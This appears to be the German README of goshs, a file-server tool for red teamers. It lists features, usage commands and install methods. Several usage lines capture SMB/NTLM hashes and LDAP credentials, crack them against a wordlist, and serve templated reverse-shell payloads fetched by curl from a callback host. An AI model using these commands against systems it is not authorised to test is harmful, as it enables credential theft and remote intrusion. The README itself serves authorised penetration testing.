
Funktionsreicher Single-Binary-Dateiserver für Red Teamer und Entwickler. HTTP/S · WebDAV · FTP/SFTP · SMB · LDAP/S · NTLM-Hash-Erfassung · DNS/SMTP-Callbacks · TLS · Auth · Freigabelinks. Ein leistungsstarker Ersatz für python3 -m http.server.
Du bist mitten in einem Engagement. Du musst eine Datei übertragen, einen SMB-Hash abfangen oder schnell einen HTTPS-Server aufsetzen – und python3 -m http.server reicht nicht aus.
goshs ist ein Single-Binary Dateiserver, der für Momente gebaut wurde, in denen du mehr als Pythons SimpleHTTPServer brauchst, aber keinen Apache konfigurieren willst. HTTP/S, WebDAV, FTP/SFTP, SMB, LDAP/S, Basic Auth, Share-Links, DNS/SMTP-Callbacks, NTLM-Hash-Capture + Cracking – alles aus einem Befehl.


Probier es selbst aus: demo.goshs.de

# Aktuelles Verzeichnis auf Port 8000 ausliefern
goshs
# Mit HTTPS (selbst-signiert) und Basic Auth
goshs -s -ss -b user:password
# SMB-Hashes abfangen
goshs -smb -smb-domain CORP
# LDAP-Zugangsdaten und NTLM-Hashes abfangen (mit optionalem Wordlist-Cracking)
goshs -ldap
goshs -ldap -ldap-wordlist /usr/share/wordlists/rockyou.txt
# DNS-Callbacks abfangen und E-Mails empfangen
goshs -dns -dns-ip 1.2.3.4 -smtp -smtp-domain your-domain.com
# Selbstzerstörung nach 2 Stunden
goshs --ttl 2h
# Mit interaktivem Terminal-Dashboard (ideal für kopflose SSH-Sitzungen)
goshs --tui
# Payloads ausliefern, die beim Download automatisch deinen Callback-Host/Port eintragen
goshs -i 10.10.14.7 --template --tpl-var LPORT=4444
# Rendern abrufen: curl 'http://10.10.14.7:8000/rev.ps1?tpl'
Ausführliche Dokumentation unter docs.goshs.de
goshs kann Tab-Vervollständigung für bash, fish und zsh installieren:
goshs --completion bash
goshs --completion fish
goshs --completion zsh
Unter macOS mit Homebrew wird der korrekte Homebrew-Pfad automatisch verwendet. Nach der Installation gibt der Befehl eine genaue Aktivierungsanweisung aus, z.B.:
source ~/.local/share/bash-completion/completions/goshs
Die gebündelten Web-Assets sind eingecheckt, daher funktioniert ein einfacher Build ohne weiteres:
git clone https://github.com/goshs-labs/goshs.git
cd goshs
go build -o goshs .
Wenn du die JavaScript- oder SCSS-Quellen änderst, baue die Assets zuerst mit installiertem esbuild und sass neu:
make generate
go build -o goshs .
Dies sind die großartigen Beitragenden, die goshs noch sicherer gemacht haben ❤️
Tritt der Discord-Community bei und vernetze dich.
Ein besonderer Dank geht an sc0tfree für die Inspiration dieses Projekts durch sein in Python geschriebenes Projekt updog.
| 📁 Dateioperationen | Download (fortsetzbar & suchbar per HTTP Range), Upload (Drag & Drop, POST/PUT), Löschen, Massen-ZIP, QR-Codes |
| 🔌 Protokolle | HTTP/S, WebDAV, FTP/SFTP, SMB, LDAP/S |
| 🔒 Authentifizierung & Sicherheit | Basic Auth, Zertifikatsauthentifizierung, TLS (selbst-signiert, Let's Encrypt, benutzerdefiniertes Zertifikat), IP-Whitelist, dateibasierte ACLs |
| ⚙️ Server-Modi | Schreibgeschützt, Nur-Upload, Kein-Löschen, Lautlos, Unsichtbar, CLI-Befehlsausführung, TTL-Selbstzerstörung |
| 🔗 Share-Links | Token-basiertes Teilen, Download-Limit, Zeitlimit |
| 🎯 Kollaboration / CTF | DNS-Server, SMTP-Server, SMB-NTLM-Hash-Capture + Cracking, LDAP-Zugangsdaten-Capture + NTLM-Hash-Cracking (JNDI-Modus für Log4Shell), Redirect-Endpunkt, Rev Shell Catcher + Payload-Generator |
| 🧩 Payload-Templating | Rendere {{.LHOST}}/{{.LPORT}} + benutzerdefinierte --tpl-var-Werte in ausgelieferte Dateien auf Anfrage (?tpl) |
| 🔔 Integration | Webhooks, Tunnel via localhost.run, Konfigurationsdatei, JSON-API, mDNS |
| 🖥️ TUI-Dashboard | Interaktives Vollbild-Terminal-Dashboard; Live-Bereiche für HTTP, DNS, SMB, LDAP, SMTP, Reverse Shells und Zwischenablage; Shells anhängen und upgraden vom Terminal aus |
| 🛠️ Sonstiges | Dunkle/helle Themes, Zwischenablage, Selbstupdate, Protokollausgabe, Dateien einbetten, Rechte herabstufen |
| Methode |
|---|
| 🐧 curl | sh | curl -sSfL https://goshs.de/install.sh | sh |
| 🦫 Go | go install goshs.de/goshs/v2@latest |
| 🐉 Kali & Parrot OS | sudo apt install goshs |
| 🎗️ Arch Linux (AUR) | yay -S goshs-bin |
| 🖤 BlackArch | pacman -S goshs |
| 🏔️ Alpine Linux (edge) | apk add goshs |
| 🫙 Snap | snap install goshs |
| 🎩 Fedora / RHEL (COPR) | dnf copr enable goshs-labs/goshs && dnf install goshs |
| 🦎 openSUSE | sudo zypper install goshs |
| ❄️ Nix / NixOS | nix-env -iA nixpkgs.goshs |
| 🍺 Homebrew | brew install goshs |
| 🪟 Scoop | scoop bucket add extras && scoop install extras/goshs |
| 🪟 winget | winget install GoshsLabs.Goshs |
| 🍫 Chocolatey | choco install goshs |
| 🐳 Docker | docker run --rm -it -p 8000:8000 -v "$PWD:/pwd" goshs-labs/goshs:latest -d /pwd |
| 📦 Release | Download from GitHub Releases |
![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | wooseokdotkim | Guilhem7 |